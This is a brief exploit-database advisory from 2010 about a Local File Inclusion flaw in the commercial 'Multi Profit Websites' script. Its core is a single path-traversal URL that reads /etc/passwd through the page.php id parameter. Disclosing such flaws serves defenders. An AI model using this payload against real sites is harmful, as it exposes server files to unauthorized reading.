id: 11701
date: 04/10/2010
title: Multi Profit Websites Local File Inclusion (LFI)
author: H4CK3R Crew
cves: 

================================================
Multi Profit Websites Local File Inclusion (LFI)
================================================

Local File Inclusion (LFI) in Multi Profit Websites


Multi Profit Websites is a commercial script that is running on multiple
domains and they claims that this script earns money for the owner.

Vulnerability

Local File Inclusion Via URL which can be reproduced by

domain/page.php?id=../../../../../../etc/passwd


Credits,
H4CK3R Crew




#  0day.today [2023-03-24]  #